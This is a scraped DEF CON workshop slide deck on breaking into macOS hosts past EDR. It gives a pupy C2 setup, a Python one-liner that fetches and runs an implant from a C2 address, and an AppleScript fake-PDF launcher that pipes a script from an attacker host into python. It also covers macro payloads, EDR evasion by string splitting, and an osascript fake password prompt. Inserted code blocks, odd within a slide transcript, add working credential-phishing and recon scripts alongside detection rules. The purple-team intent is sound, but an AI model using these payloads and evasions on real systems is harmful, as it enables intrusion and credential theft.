Commercial in Confidence · www.digitalshadows.com
Mind the Gap!
Taking advantage of cross-platform security solutions for MacOS/Linux
DEF CON Workshop 2019-08-10
Who are we?
Richard Gold, Director of Security Engineering, Security Engineering team (@drshellface on Twitter)
• Rob Curtis (co-instructor)
• Simon Hall
• Isidoros Monogioudis
• ...and more...
Overview
• Introduction
  • Set up a pupy C2 server in a virtual environment (see the USB sticks)
• Initial Access
  • Creating a malicious macro-enabled document and/or a fake PDF with an AppleScript launcher
• Execution
  • Executing the payload to get a shell
• Credential Access
  • What gets caught, what doesn't: some simple tricks to get creds
• Discovery
  • Active Directory recon
• Collection
  • Screenshotting and friends
• Exfiltration
  • Tips'n'tricks for exfil'ing your loot
• C2
  • What works, what doesn't
• Wrap-up
  • Questions, comments, flames, etc.
Introduction
MacOS security systems
• MacOS has two main built-in security features that we need to be aware of:
  a. Gatekeeper: enforces policy on which applications may be launched (code-signing checks on downloaded, quarantine-flagged apps)
  b. XProtect: Apple's built-in set of known-malware signatures (a blocklist), checked when quarantined files are opened
• These systems are good at preventing the execution of malicious binaries that are dropped to disk (Windows tradecraft of the 2000s)
• On Windows, attackers pivoted to PowerShell and JS tooling
  a. C# is another topic entirely :)
• Turns out that Python is installed by default on MacOS (the system Python 2.7, at the time of this workshop)
  a. Most Linux systems too
EDR platform
• Endpoint Detection and Response (EDR) products are the "next-gen AV" solutions
• They have more advanced detection capabilities, including in-memory scanning
  • This is particularly useful for catching (default) Mimikatz and others!
• They also have Response capabilities:
  • Memory capture from a device
  • Quarantine
  • Forensics
Cross-platform issues
• Many software and security vendors promise cross-platform support
• Many EDR systems are cross-platform, with vendors touting their coverage of Windows, MacOS, Linux and more
• However, cross-platform support for security, especially on non-Windows platforms, is weak at best
• Even offensive toolsets are often lacking features for MacOS!
• Similarly, security features in popular products, like Microsoft Office, vary drastically from platform to platform
Motivation and Approach
• Purple Team assessments are a cornerstone of how we approach security
• We're big fans of the MITRE ATT&CK framework for both offensive & defensive work
• You don't know how well something works until you test it
  • "Right or wrong, it's very pleasant to break something from time to time." — Fyodor Dostoevsky
• Cross-platform security software is a challenge
  • This applies to both offensive and defensive tooling!
• Python to the rescue! :)
APTs
• APTs do target MacOS:
  • The Coinbase attack targeted MacOS users
  • APT28 had a MacOS version of the X-Agent implant (XAgentOSX)
  • WindShift have the WindTail implant for MacOS
  • Lazarus Group have the AppleJeus implant for MacOS
MITRE ATT&CK
"MITRE's Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary's lifecycle and the platforms they are known to target"
Planning
Threat emulation: try out a number of open source tools; there is no point re-inventing the square wheel, we're looking for effective security, not points for style.
• Tool up! Install and configure the following toolkits to get started:
  • Empire - https://github.com/EmpireProject/Empire
  • EggShell - https://github.com/neoneggplant/EggShell
  • EvilOSX - https://github.com/Marten4n6/EvilOSX
  • Pupy - https://github.com/n1nj4sec/pupy
• The steps we took (the section titles that follow) are the tactics of the MITRE ATT&CK framework: https://attack.mitre.org/tactics/enterprise/
C2 server OS setup
• If you already have VMware Fusion, you can use that
• Otherwise, install VirtualBox on your MacOS device:
  • https://download.virtualbox.org/virtualbox/6.0.8/VirtualBox-6.0.8-130520-OSX.dmg
  • Or grab it from the USB stick
• Get the Kali image:
  • https://images.offensive-security.com/virtual-images/kali-linux-2019.2-vbox-amd64.ova
  • Or grab it from the USB stick
Pupy C2 server setup
To install the Pupy server component (inside the Kali VM):
• sudo apt install git libssl1.0-dev libffi-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
• git clone --recursive https://github.com/n1nj4sec/pupy
• cd pupy
• python create-workspace.py -DG pupyws
• sudo -H pip install scapy --upgrade
  • There is an installation issue with scapy 2.4.2, which pupy currently pins; 2.4.3 works though
• sudo pupyws/bin/pupysh
pupy
• By default pupy listens on port 443 for C2 callbacks
• By default pupy uses port 9000 for staging the implant
• The above can be confusing and catch people out at the beginning, especially when dealing with protected environments: a target that can reach 443 outbound may well not be able to reach 9000
• You can probably get 80 & 443 outbound to a cloud infra provider
• Create a Python one-liner for staging your pupy implant (from the pupysh prompt):
  • gen -f py_oneliner
• Your one-liner should look a bit like this (Python 2 syntax, which is what the MacOS system python was at the time):
  • python -c 'import urllib;exec urllib.urlopen("http://172.16.1.198:9000/d47OwioFmM/Zjlu5VIOkL").read()'
• The one-liner downloads the implant over HTTP and executes it in memory; nothing is written to disk
Experiment!
Install pupy & test the one-liner
Initial Access
Initial Access
• Our tried and true technique of spearphishing with a macro-enabled document as an attachment (T1193) or a link (T1192) is our go-to for attacking MacOS users
• While macros can be disabled across an organization now, it requires an MDM solution to work effectively across a fleet of machines
• Certain users and functions, like payroll, often require macros to be enabled, and there is no "Trusted Locations" or signed-macro support in Office for Mac
Initial Access - Macros
• We will practice creating macro-enabled documents in MS Office
• Note: while email filtering gateways may convert or block macro-enabled files, Spearphishing with a Link (T1192) works exceptionally well for delivering a payload to the user
• Bonus points: use a well-known file locker like Dropbox or Google Drive to host your payload
• You may need to zip up your payload to avoid prying eyes
Macro creation HOWTO
• Generate osx/macro using Empire (which absorbed EmPyre's MacOS stagers):
  • git clone https://github.com/EmpireProject/Empire
  • sudo ./setup/install.sh
  • sudo ./empire
  • listeners
  • uselistener http
  • usestager osx/macro
  • Modify cmd to include the (obfuscated) pupy one-liner
• OR
  • Use our macro template from the USB stick
• Pro-tip:
  • You need to add: Private Declare PtrSafe Function system Lib "/usr/lib/libc.dylib" Alias "popen" (ByVal command As String, ByVal mode As String) As LongPtr
  • A defender can block the import of the external library
  • H/T https://www.slideshare.net/DannyChrastil/pwning-in-the-sandbox-osx-macro-exploitation, slide 42
Fake PDF with AppleScript launcher
• Alternatively, use AppleScript as the launcher and use Script Editor to export it as an Application; H/T TokyoNeon: https://null-byte.wonderhowto.com/how-to/hacking-macos-create-fake-pdf-trojan-with-applescript-part-2-disguising-script-0184706/
• Host this on a well-known file locker for maximum pwnage
• EDR does not have the same sensitivity to AppleScript as it does to PowerShell or JavaScript on Windows
• You can try to follow the tutorial on the web page or grab the pre-packaged payload from the USB stick
Fake PDF with AppleScript launcher
• The attack uses AppleScript to download and display a decoy PDF & run pupy:
  • do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"
• You need a web server (like python -m SimpleHTTPServer 8080) to serve up the Python script and the decoy PDF
• By using tweaked icons and unicode obfuscation tricks it's possible to make a really convincing fake PDF
• Remember to use the string concat trick in your launcher if EDR is present!
Experiment!
Generate a malicious macro and/or AppleScript document
Execution
Execution
A mixture of User Execution (T1204) and Scripting (T1064) is an obvious and effective way to gain code execution
• Some tricks of the trade: in Office 16+ you now need the full file path to call out to the system library
• Our first EDR detection! Turns out the vanilla Empire VBA macro is heavily signatured by our target EDR system, and most likely others. Does it get picked up by your EDR system?
• It seems any piece of code from the Empire toolset is picked up, not just the launcher
Bypassing EDR
• The bypass required us to go crude:
  • "If they think you're crude, go technical; if they think you're technical, go crude. I'm a very technical boy. So I decided to get as crude as possible" -- Johnny Mnemonic, William Gibson
• In practice: strip out all the "fancy" base64 encoding and execute the pupy Python one-liner directly; we've had success with this in the past
• If your EDR provider signatures the Python one-liner, with the magical powers of string concatenation we can often bypass the signature
• But now you're in the Office sandbox; this gets complicated, as bypasses come and go. Even without a bypass, you can still cat /etc/passwd undetected, however
  • https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/ [obsolete]
• Some people (not me!) have reported success with:
  • https://github.com/cldrn/macphish/wiki/Abusing-GrantAccessToMultipleFiles
Execution continued...
• EggShell worked when executed directly
  • Plot twist: binaries are not checked when dropped to disk (as traditional AV does) but only when they are executed; maybe a surprise to people not familiar with EDR
  • Fixed now, but the reality of modern EDR is that you can drop a 24/58 VT-scored binary onto disk and have it executed without any problems
• EvilOSX worked when executed directly
  • Still does...! Although some EDR systems we have tried have detected it
Experiment!
Execute the payload from the document; try EggShell, EvilOSX, ...
Credential Access
Credential Access
Any usage of the Empire credential stealers (T1003) gets immediately flagged and blocked (process killed), even from within pupy running in-memory, because it drops the stealer to disk
• EDR is pretty good at looking for programmatic access to credential stores
• We went crude, again, this time with FiveOnceInYourLife (H/T fuzzynop) (T1056)
  • Let's try it out!
  • https://github.com/fuzzynop/FiveOnceInYourLife
  • (needs to be run in a non-sandboxed environment)
FiveOnceInYourLife
• Command: FOIYL.py
• Prompt the user for admin credentials "for an update"; users are often conditioned to do this by Slack and friends. A simple bit of AppleScript triggered via osascript is a) effective & b) undetected
• Hey presto! Local admin creds!
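Added example, not the FiveOnceInYourLife code itself: the osascript credential-prompt pattern (T1056) in a few lines, the parsing of what osascript hands back, and the detection a defender can run over process events to catch it. The dialog text, the sample osascript output and the event records are constructed for this example; the process-event field names (`image`, `cmdline`, `parent`) are an assumed shape, not any vendor's schema.

```python
# Added example: osascript password prompt (attacker side) and a process-event
# rule that flags it (defender side). Dialog text, osascript output sample and
# the event records are constructed; the event schema is assumed.
import re
import subprocess

# Shown to the victim. "with hidden answer" turns the text field into a
# password field; the title imitates a software-update prompt.
PROMPT_SCRIPT = (
    'display dialog "Software Update needs your password to continue." '
    'default answer "" with hidden answer with icon caution '
    'buttons {"Cancel", "OK"} default button "OK" '
    'with title "Software Update"'
)

# osascript prints the dialog record as 'button returned:OK, text returned:...'
RESULT_RE = re.compile(r"^button returned:(?P<button>[^,]*), text returned:(?P<text>.*)$")


def osascript_argv(script=PROMPT_SCRIPT):
    """argv the attacker runs; hand it to subprocess.run on a real Mac."""
    return ["osascript", "-e", script]


def parse_dialog_result(stdout):
    """Return the typed text, or None if the user cancelled. Cancel makes
    osascript exit non-zero with 'User canceled. (-128)' on stderr and
    nothing on stdout, so an empty string also maps to None."""
    m = RESULT_RE.match(stdout.strip())
    if m is None or m.group("button") != "OK":
        return None
    return m.group("text")


def prompt_for_password():
    """Only meaningful on macOS: show the dialog and return what was typed."""
    proc = subprocess.run(osascript_argv(), capture_output=True, text=True)
    return parse_dialog_result(proc.stdout) if proc.returncode == 0 else None


# --- defender side ---------------------------------------------------------
# Genuine macOS authorization prompts are drawn by SecurityAgent, never by an
# osascript "display dialog". Any hidden-answer dialog from osascript is worth
# an alert; one whose parent is a script interpreter or an Office app is
# exactly the macro / one-liner chain this workshop walks through.
SCRIPT_PARENTS = ("python", "python2.7", "python3", "bash", "sh", "zsh",
                  "Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint")


def classify(event):
    """event: dict with 'image', 'cmdline' and 'parent' (assumed schema).
    Returns None (benign), 'medium' or 'high'."""
    if not event["image"].endswith("/osascript"):
        return None
    cmd = event["cmdline"]
    if "display dialog" not in cmd or "hidden answer" not in cmd:
        return None
    return "high" if event["parent"] in SCRIPT_PARENTS else "medium"


def flag_events(events):
    return [e for e in events if classify(e) is not None]


# Constructed process events, not real telemetry.
SAMPLE_EVENTS = [
    {"pid": 4242, "parent": "python2.7", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e " + PROMPT_SCRIPT},
    {"pid": 4300, "parent": "Finder", "image": "/usr/bin/osascript",
     "cmdline": 'osascript -e display notification "Backup finished"'},
    {"pid": 4311, "parent": "launchd",
     "image": "/System/Library/Frameworks/Security.framework/Versions/A/"
              "MachServices/SecurityAgent.bundle/Contents/MacOS/SecurityAgent",
     "cmdline": "SecurityAgent"},
    {"pid": 4350, "parent": "Script Editor", "image": "/usr/bin/osascript",
     "cmdline": "osascript -e " + PROMPT_SCRIPT},
]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["pid"], e["parent"], classify(e))
```

The deck's finding is that the prompt went unnoticed by the EDR under test; the rule above is the cheap fix, because `hidden answer` has no business appearing in an osascript command line launched from python or an Office process. Keying on the parent alone is not enough, which is why the rule still raises a medium alert for any other parent.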
Experiment!
Try FiveOnceInYourLife and/or hashdump
Discovery
Discovery
If your target is domain-joined, you'll want to do some more investigating
• The in-scope Macs are all domain-joined and we would like to recon the Active Directory environment, e.g., which groups (T1069) and which shares (T1135) are available
• Our Windows testing revealed that all our standard net user/net group Active Directory enumeration commands were picked up by the EDR system
• We were pleasantly surprised to discover that the MacOS-equivalent commands (dscl and dsconfigad), which return exactly the same information as their Windows cousins, were completely undetected!
  • List all Domain Admins, etc.
Active Directory recon
We will not run these commands for real, as we will not have an Active Directory environment available; we will review their syntax and go over the expected output
(“.” is the local directory node; “/Active Directory/ABC/All Domains” is the AD node, where ABC is the domain's NetBIOS name)
• dscl . ls /Users
• dscl . read /Users/user.mcuserface
• dscl "/Active Directory/ABC/All Domains" ls /Users
• dscl "/Active Directory/ABC/All Domains" read /Users/service_account
• dscl "/Active Directory/ABC/All Domains" ls /Computers
• dscl "/Active Directory/ABC/All Domains" read "/Computers/XYZ"
• dscl . ls /Groups
• dscl . read "/Groups/powerusers"
• dscl "/Active Directory/ABC/All Domains" ls /Groups
• dscl "/Active Directory/ABC/All Domains" read "/Groups/ABCDomain Admins"
• dsconfigad -show
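Since the workshop cannot run these against a live domain, here is an added example (not from the deck) that scripts the same recon: the argv for each dscl/dsconfigad step above, plus a parser for `dscl ... read` output so that group membership can be checked programmatically. The node name ABC, the group record name, and both output samples are constructed placeholders; the parser assumes dscl's usual `Attr: v1 v2` single-line form and the `Attr:` followed by space-indented lines form for values containing spaces, which is what it prints on a real Mac.

```python
# Added example: dscl/dsconfigad recon as argv lists, and a parser for the
# `dscl <node> read <record>` output format. Node name, group name and the
# sample outputs are constructed placeholders.
AD_NODE = "/Active Directory/ABC/All Domains"   # ABC = domain NetBIOS name (placeholder)


def recon_commands(node=AD_NODE, group="Domain Admins"):
    """argv lists (not executed here) mirroring the slide's recon steps.
    The exact group record name varies by domain; run the ls /Groups step
    first and copy the name from there."""
    return {
        "local_users": ["dscl", ".", "ls", "/Users"],
        "domain_users": ["dscl", node, "ls", "/Users"],
        "domain_computers": ["dscl", node, "ls", "/Computers"],
        "domain_groups": ["dscl", node, "ls", "/Groups"],
        "group_members": ["dscl", node, "read", "/Groups/" + group, "GroupMembership"],
        "ad_config": ["dsconfigad", "-show"],
    }


def parse_dscl_read(text):
    """Parse `dscl <node> read <record>` output into {attribute: [values]}.
    Single-line form:  'Attr: v1 v2'          (space-separated values)
    Multi-line form:   'Attr:' then one space-indented line per value
                       (used when a value contains spaces)
    Attribute names can contain ':' themselves (dsAttrTypeNative:...), so
    the split is on ': ' rather than the first colon."""
    attrs = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith(" ") and current is not None:
            attrs[current].append(line[1:])
        elif line.endswith(":"):
            current = line[:-1]
            attrs[current] = []
        else:
            key, _, rest = line.partition(": ")
            current = key
            attrs[key] = rest.split()
    return attrs


def group_members(read_output):
    return parse_dscl_read(read_output).get("GroupMembership", [])


def is_member(read_output, user):
    return user in group_members(read_output)


def parse_dsconfigad_show(text):
    """dsconfigad -show prints 'Key = value' lines under section headings;
    headings carry no '=' and are skipped."""
    out = {}
    for line in text.splitlines():
        if " = " in line:
            key, value = line.split(" = ", 1)
            out[key.strip()] = value.strip()
    return out


# Constructed sample of: dscl "/Active Directory/ABC/All Domains" read "/Groups/Domain Admins"
SAMPLE_GROUP_READ = """\
dsAttrTypeNative:objectSid: S-1-5-21-1111111111-2222222222-3333333333-512
AppleMetaNodeLocation:
 /Active Directory/ABC/abc.example
GroupMembership: administrator svc_backup j.doe
PrimaryGroupID: 512
RealName:
 Domain Admins
RecordName:
 ABC\\Domain Admins
RecordType: dsRecTypeStandard:Groups
"""

# Constructed sample of: dsconfigad -show
SAMPLE_DSCONFIGAD = """\
Active Directory Domain          = abc.example
Active Directory Forest          = abc.example
Computer Account                 = mac-1234$
Advanced Options - User Experience
  Create mobile account at login = Enabled
"""


if __name__ == "__main__":
    for name, argv in recon_commands().items():
        print("%-16s %s" % (name, " ".join(argv)))
    print("Domain Admins:", group_members(SAMPLE_GROUP_READ))
    print("Joined domain:", parse_dsconfigad_show(SAMPLE_DSCONFIGAD)["Active Directory Domain"])
```

On an engagement you would feed `subprocess.run(argv, capture_output=True, text=True).stdout` into the parsers instead of the samples. For the defender, the point the deck makes stands: `dscl` reads against the AD node and `dsconfigad -show` are exactly as informative as `net group "Domain Admins" /domain`, so they deserve the same process-command-line detection that the Windows equivalents already get.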
Discovery continued
EvilOSX has a function to discover the bookmarks stored by the browser, which can be helpful for revealing internal information (at least internal system names); this was also undetected
Experiment!
Try to steal bookmarks
Collection
Collection
Screen capture (T1113), webcam capture (T1125) and microphone capture (T1123) can all be performed with pupy, EvilOSX and EggShell
• All three types of collection from all three tools were undetected
• FIN7, APT28, etc. make extensive use of this form of collection
• We will try different types of collection with the various tools
pupy Collection
By default pupy comes with a variety of collection modules (the "gather" category)
• help -M to list available modules
• Just type the name of the module to use it, for example:
  • screenshot (currently not working on Linux due to a dependency issue)
  • keylogger (currently not working on MacOS)
  • users
  • get_info
Experiment!
Explore the different "gather" modules, e.g., keylogger
Exfiltration
Exfiltration
Web filtering is an issue, but whitelists are often overly broad
• Our favourites are big-name tech firms who also offer cloud hosting, e.g., Amazon AWS, Microsoft Azure, Google Cloud Platform, etc.
• It is very difficult for organizations to differentiate between legitimate and non-legitimate data flows to cloud providers
• The C2 channel works great in many cases (T1041)
Experiment!
Try to exfil a file with pupy
Command and Control
Command and Control
• HTTPS is an obvious favourite (T1071)
• We'll review the different options present in the tools
• Self-signed certs will get you caught
  • Let's Encrypt to the rescue? (Future work for keen attendees!)
• SSL interception can still catch you out
• If you're lucky, the targets will drop off of the corporate network or the VPN
Wrap-up
Conclusions
• True feature parity across platforms is a myth
• MacOS is typically underserved by both cross-platform software and security
• We got T-shirts, but many questions still remain about EDR effectiveness on MacOS
• Going crude: even really basic techniques are enough to get you success
• Once you move off of the mainstream offensive toolsets (Empire), there are plenty of options
• This workshop has walked you through the tools and processes you can use to break in and out of protected MacOS environments
More Related Content

PPTX
Staying connected: An Overview of Announcements from Microsoft’s Connect();
dotNet Miami
 
PPTX
Dd13.2013.milano.open ntf
Ulrich Krause
 
PDF
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
Aditya K Sood
 
PDF
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
PDF
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
PPTX
Offensive Python for Pentesting
Mike Felch
 
PDF
Visiting the Bear Den
ESET
 
PDF
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
 
Staying connected: An Overview of Announcements from Microsoft’s Connect();
dotNet Miami
 
Dd13.2013.milano.open ntf
Ulrich Krause
 
HackInTheBox - AMS 2011 , Spying on SpyEye - What Lies Beneath ?
Aditya K Sood
 
Red Team Tactics for Cracking the GSuite Perimeter
Mike Felch
 
I got 99 trends and a # is all of them
Roberto Suggi Liverani
 
Offensive Python for Pentesting
Mike Felch
 
Visiting the Bear Den
ESET
 
0day hunting a.k.a. The story of a proper CPE test
Balazs Bucsay
 

Similar to DEF CON 27 - workshop - RICHARD GOLD - mind the gap (20)

PPTX
Advanced Internet of Things firmware engineering with Thingsquare and Contiki...
Adam Dunkels
 
PDF
Tampere Docker meetup - Happy 5th Birthday Docker
Sakari Hoisko
 
PPTX
Docker, how to use it. organize a meeting with IBM products...
Andrea Fontana
 
PDF
Ci for i-os-codemash-01.2013
Kevin Munc
 
PPT
RSA SF Conference talk-2009-ht2-401 sallam
Ahmed Sallam
 
PDF
5GCroCo_DockerSecurityBasics_Training.pdf
MaghsoudAbbasPour1
 
PDF
Pursuing evasive custom command & control - GuideM
Mark Secretario
 
PPTX
Security research over Windows #defcon china
Peter Hlavaty
 
PPTX
.docker : How to deploy Digital Experience in a container, drinking a cup of ...
ICON UK EVENTS Limited
 
PPTX
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
lior mazor
 
PDF
Dockercon eu tour 2015 - Devoxx Casablanca
Michel Courtine
 
PPTX
Free Mongo on OpenShift
Steven Pousty
 
PPTX
Docker Bday #5, SF Edition: Introduction to Docker
Docker, Inc.
 
PPTX
docker : how to deploy Digital Experience in a container drinking a cup of co...
Matteo Bisi
 
PDF
Docker 101: An Introduction
POSSCON
 
PPTX
Get the Exact Identity Solution You Need - In the Cloud - Overview
ForgeRock
 
PPTX
.docker : how to deploy Digital Experience in a container drinking a cup of c...
Andrea Fontana
 
PPTX
DockerDay2015: Keynote
Docker-Hanoi
 
PDF
Docker Enterprise Deployment Planning
Stephane Woillez
 
PDF
Strategy, planning and governance for enterprise deployments of containers - ...
The Incredible Automation Day
 
Advanced Internet of Things firmware engineering with Thingsquare and Contiki...
Adam Dunkels
 
Tampere Docker meetup - Happy 5th Birthday Docker
Sakari Hoisko
 
Docker, how to use it. organize a meeting with IBM products...
Andrea Fontana
 
Ci for i-os-codemash-01.2013
Kevin Munc
 
RSA SF Conference talk-2009-ht2-401 sallam
Ahmed Sallam
 
5GCroCo_DockerSecurityBasics_Training.pdf
MaghsoudAbbasPour1
 
Pursuing evasive custom command & control - GuideM
Mark Secretario
 
Security research over Windows #defcon china
Peter Hlavaty
 
.docker : How to deploy Digital Experience in a container, drinking a cup of ...
ICON UK EVENTS Limited
 
The Hacking Games - A Road to Post Exploitation Meetup - 20240222.pptx
lior mazor
 
Dockercon eu tour 2015 - Devoxx Casablanca
Michel Courtine
 
Free Mongo on OpenShift
Steven Pousty
 
Docker Bday #5, SF Edition: Introduction to Docker
Docker, Inc.
 
docker : how to deploy Digital Experience in a container drinking a cup of co...
Matteo Bisi
 
Docker 101: An Introduction
POSSCON
 
Get the Exact Identity Solution You Need - In the Cloud - Overview
ForgeRock
 
.docker : how to deploy Digital Experience in a container drinking a cup of c...
Andrea Fontana
 
DockerDay2015: Keynote
Docker-Hanoi
 
Docker Enterprise Deployment Planning
Stephane Woillez
 
Strategy, planning and governance for enterprise deployments of containers - ...
The Incredible Automation Day
 
Ad

More from Felipe Prado (20)

PDF
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
PDF
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
PDF
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
PDF
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
PDF
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
PDF
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
PDF
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
PDF
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
PDF
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
PDF
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
PDF
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
PDF
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
PDF
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
PDF
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
PDF
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
PDF
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
PDF
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
PDF
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
PDF
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
PDF
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 
Ad

Recently uploaded (20)

PDF
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PDF
REPORT: Heating appliances market in Poland 2024
SPIUG
 
PDF
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
PDF
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
PDF
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
PDF
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
Doc9.....................................
SofiaCollazos
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
PDF
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
PPTX
IT Runs Better with ThousandEyes AI-driven Assurance
ThousandEyes
 
PDF
Brief History of Internet - Early Days of Internet
sutharharshit158
 
PDF
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
PDF
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
PPTX
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 
Economic Impact of Data Centres to the Malaysian Economy
flintglobalapac
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
REPORT: Heating appliances market in Poland 2024
SPIUG
 
Oracle AI Vector Search- Getting Started and what's new in 2025- AIOUG Yatra ...
Sandesh Rao
 
Orbitly Pitch Deck|A Mission-Driven Platform for Side Project Collaboration (...
zz41354899
 
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
Make GenAI investments go further with the Dell AI Factory
Principled Technologies
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
OFFOFFBOX™ – A New Era for African Film | Startup Presentation
ambaicciwalkerbrian
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
Doc9.....................................
SofiaCollazos
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
Get More from Fiori Automation - What’s New, What Works, and What’s Next.pdf
Precisely
 
Tea4chat - another LLM Project by Kerem Atam
a0m0rajab1
 
IT Runs Better with ThousandEyes AI-driven Assurance
ThousandEyes
 
Brief History of Internet - Early Days of Internet
sutharharshit158
 
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
Applied-Statistics-Mastering-Data-Driven-Decisions.pptx
parmaryashparmaryash
 

DEF CON 27 - workshop - RICHARD GOLD - mind the gap

  • 1. Commercial in Confidence· www.digitalshadows.com Taking advantage of cross-platform security solutions for MacOS/Linux DEF CON Workshop 2019-08-10 Mind the Gap!
  • 2. Commercial in Confidence· www.digitalshadows.com2 Who are we? Richard Gold Security Engineering team Director of Security Engineering @drshellface on Twitter • Rob Curtis • co-instructor • Simon Hall • Isidoros Monogioudis • ...and more...
  • 3. Commercial in Confidence· www.digitalshadows.com3 • Introduction • Setup a pupy C2 server in a virtual environment (see the USB sticks) • Initial Access • creating a malicious macro-enabled document and/or a fake PDF with an AppleScript launcher • Execution • executing the payload to get a shell • Credential Access • what gets caught, what doesn’t - some simple tricks to get creds • Discovery • Active Directory recon • Collection • Screenshotting and friends • Exfil • Tips’n’tricks for exfil’ing your loot • C2 • What works, what doesn’t • Wrap-up • Questions, comments, flames, etc. Overview
  • 4. Commercial in Confidence· www.digitalshadows.com Introduction
